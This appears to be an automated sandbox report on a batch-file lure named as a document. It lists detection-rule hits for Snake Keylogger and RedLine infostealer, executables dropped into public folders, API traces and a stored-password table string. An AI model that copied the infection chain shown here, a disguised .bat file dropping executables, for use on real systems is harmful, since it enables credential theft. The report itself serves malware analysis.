              Source: 22.2.xzeheenC.pif.34ca0f08.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34ca0f08.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2e330000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.23786478.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2e330000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.23786478.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.226c0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.226c0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 18.2.Cneehezx.PIF.214d58a8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.2.xzeheenC.pif.33965570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.33965570.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.23785570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.23785570.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 18.2.Cneehezx.PIF.21496c78.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.3.xzeheenC.pif.2072dd00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.3.xzeheenC.pif.2072dd00.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.2.xzeheenC.pif.34ca0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34ca0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.3255c896.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3255c896.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2c595570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c595570.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.33966478.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.33966478.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.3.xzeheenC.pif.30aaea30.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.3.xzeheenC.pif.30aaea30.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000010.00000001.1581941889.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000001A.00000002.2726733311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000010.00000002.2726799985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000016.00000001.1707089110.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000001A.00000001.1780155418.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000016.00000002.2726848233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winBAT@42/18@5/4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1232B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF7AB1232B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,7_2_00007FF792DD826C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB14FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF7AB14FB54
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D174EC CoCreateInstance,CoCreateInstance,#357,#357,SysFreeString,SysFreeString,LocalFree,SysStringByteLen,SysFreeString,lstrcmpW,lstrcmpW,SysStringByteLen,lstrcmpW,LocalFree,SysStringByteLen,GetLastError,#357,SysStringByteLen,GetLastError,#357,#357,LocalFree,#357,lstrcmpW,SysStringByteLen,SysStringByteLen,#357,SysStringByteLen,#357,#357,LocalFree,SysFreeString,SysFreeString,SysFreeString,LocalFree,SysFreeString,7_2_00007FF792D174EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D673F0 GetModuleHandleW,GetLastError,#357,FindResourceW,GetLastError,LoadResource,GetLastError,SizeofResource,LockResource,GetLastError,LocalAlloc,memmove,7_2_00007FF792D673F0
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "
              Source: C:\Users\Public\Libraries\spoolsv.COMKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Cneehezx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: xzeheenC.pif, 00000010.00000002.2761760799.000000002C68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.00000000329E1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A3B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.00000000329FF000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A47000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2762571543.0000000033A5B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.00000000329F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2763742215.000000002387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: F.O Pump Istek,Docx.batReversingLabs: Detection: 23%
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
